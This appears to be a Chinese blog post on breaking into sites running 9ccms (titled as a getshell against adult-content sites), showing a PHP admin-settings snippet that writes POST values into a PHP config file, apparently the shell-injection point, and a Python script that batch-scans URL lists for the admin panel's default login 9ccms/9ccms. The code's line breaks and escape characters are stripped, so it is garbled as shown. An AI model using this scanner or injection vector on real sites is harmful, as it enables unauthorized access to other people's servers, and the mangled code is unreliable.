9ccms(久草CMS)-颜色网站渗透getshell 附批量检测代码

<?php
if (isset($_POST['submit']) && isset($_POST['username']) && isset($_POST['password'])  && isset($_POST['ippass']) ) {function post_input($data){$data = stripslashes($data);$data = htmlspecialchars($data);return $data;}$username = post_input($_POST["username"]);$password = post_input($_POST["password"]);  $ippass = post_input($_POST["ippass"]);  $str = '';  $str .= '<?php';  $str .= "n";  $str .= '//后台密码';  $str .= "n";  $str .= 'define('USERNAME', ''.$username.'');';  $str .= "n";  $str .= 'define('PASSWORD', ''.$password.'');';  $str .= "n";  $str .= 'define('IPPASS', ''.$ippass.'');';  $str .= "n";    $str .= '?>';  $ff = fopen("../JCSQL/Admin/Security/AdminUser.php",'w+');  fwrite($ff,$str);?>

import timeimport requestsimport osfrom requests.sessions import sessionos.system('')from requests.packages.urllib3.exceptions import InsecureRequestWarning# 禁用安全请求警告requests.packages.urllib3.disable_warnings(InsecureRequestWarning)import argparseclass poc():    def title(self):        print('''+-----------------------------------------------------------------+漏洞名称:9CCCMS 弱口令功能：单个检测，批量检测                                     单个检测：python poc.py -u url批量检测：python poc.py -f 1.txt+-----------------------------------------------------------------+                                     ''')    def poc(self, target_ur):        url = f'{target_ur}/adminx/'        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}        try:            res = requests.get(url=url, headers=headers,verify=False,timeout=10)            return res        except Exception as e:            print("33[31m[x] 请求失败 33[0m", e)    def main(self, target_url, file):        self.title()        count=0        if target_url:            res=self.poc(target_url)            if res.status_code==200 and "当前使用的是默认账号" in res.text:                print(f'33[31m[+] {target_url} 存在弱口令：9ccms/9ccms 33[0m')        if file:            for url in file:                count += 1                target_url = url.replace('n', '')  #取消换行符                #time.sleep(1)                res=self.poc(target_url)                try:                    if res.status_code==200 and "当前使用的是默认账号" in res.text:                        print(f'33[31m[{count}] 响应值为200，{target_url} 存在弱口令：9ccms/9ccms33[0m')                    else:                        print(f'[{count}] 响应值为{res.status_code}，{target_url} 不存在弱口令')                except Exception as e:                    print("33[31m[x] 请求失败 33[0m", e)if __name__ == '__main__':    parser = argparse.ArgumentParser()    parser.add_argument('-u','--url',type=str,default=False,help="目标地址，带上http://")    parser.add_argument("-f",'--file', type=argparse.FileType('r'),default=False,help="批量检测，带上http://")    args = parser.parse_args()    run = poc()    run.main(args.url, args.file)